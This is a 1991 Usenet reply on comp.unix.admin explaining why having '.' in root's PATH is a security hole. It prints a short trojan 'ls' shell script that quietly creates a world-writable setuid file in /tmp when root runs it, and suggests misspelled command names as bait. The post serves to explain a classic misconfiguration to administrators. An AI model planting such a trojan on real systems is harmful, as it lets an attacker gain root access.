Path: utzoo!utgpu!news-server.csri.toronto.edu!rpi!zaphod.mps.ohio-state.edu!swrinde!cs.utexas.edu!sun-barr!newstop!sunaus.oz!sde1!sde1!jonw
From: jonw@assip.csasyd.oz (Jon Wright)
Newsgroups: comp.unix.admin
Subject: Re: Mysterious security hole
Message-ID: <jonw.676771017@sde1>
Date: 12 Jun 91 23:56:57 GMT
References: <91161.131540SCHDAVZ@YaleVM.YCC.Yale.Edu>
Organization: Computer Sciences of Australia, Pty Ltd.
Lines: 58

In <91161.131540SCHDAVZ@YaleVM.YCC.Yale.Edu> SCHDAVZ@YaleVM.YCC.Yale.Edu (Dave Schweisguth) writes:

>This probably isn't so mysterious, but the subject line has got to be zippy or
>nobody'll read my post.
> 
>The 'login' command initializes PATH with (among other useful directories)
>'.'. 'su' leaves '.' out. A footnote to a Unix book I have here hints at a
>security hole involving the _position_ of '.' in PATH, claiming that having
>'.' first is dangerous. It doesn't say why.
>     These add up to something screwy with '.'. Can someone explain why root/
>Joe User ought/ought not have '.' in his/her path, and if so should it be
>first, last, or anywhere, and (this is the good part) why? The system is an
>SGI Personal Iris, IRIX v3.3.2, if it matters.
>

Simple......
If ROOT has "." in his/her path, I create a file called "ls" in any directory
that is:
	a. I have write permission for
	b. Root may use....
My ls will do the following:
	#!/bin/sh
	WHO=`whoami`
	FILE=/tmp/...gotcha.${WHO}
	echo > ${FILE}
	chmod ugo+rwx ${FILE}
	chmod ug+s ${FILE}
	/bin/ls $*
or something similar (I don't want an arguement about the correctness of this
example - the idea is right).

Now I wait patiently and keep checking /tmp, eventually root will try to run ls
in that directory, and bingo I now have a setuid file thta I can modify.

Obviously I need to pick a command that is not built into the shell and also that
appears in the path later than "."

If "." is at the end, then try common misspellings of commands such as "ls-" and
"act" etc.

> 
>This may well be an FAQ (the book certainly seems to think so) but I haven't
>found an FAQ list. If there is one, please let me know. Thanks!
> _____________________________________________________________________________
>/                                                                             \
>|   Dave Schweisguth               5386 Yale Station           203-436-2694   |
>|   schdavz@yalevm.ycc.yale.edu    New Haven, CT 06502-5386                   |
>\_____________________________________________________________________________/

Hope this helps,


		Regards,
			    Jon Gilbert Wright

	Network Manager				Unix Systems Consultant
	Computer Sciences of Australia		Guru Software Services
	jonw@assip.csasyd.oz			gremlin@runxtsa.runx.oz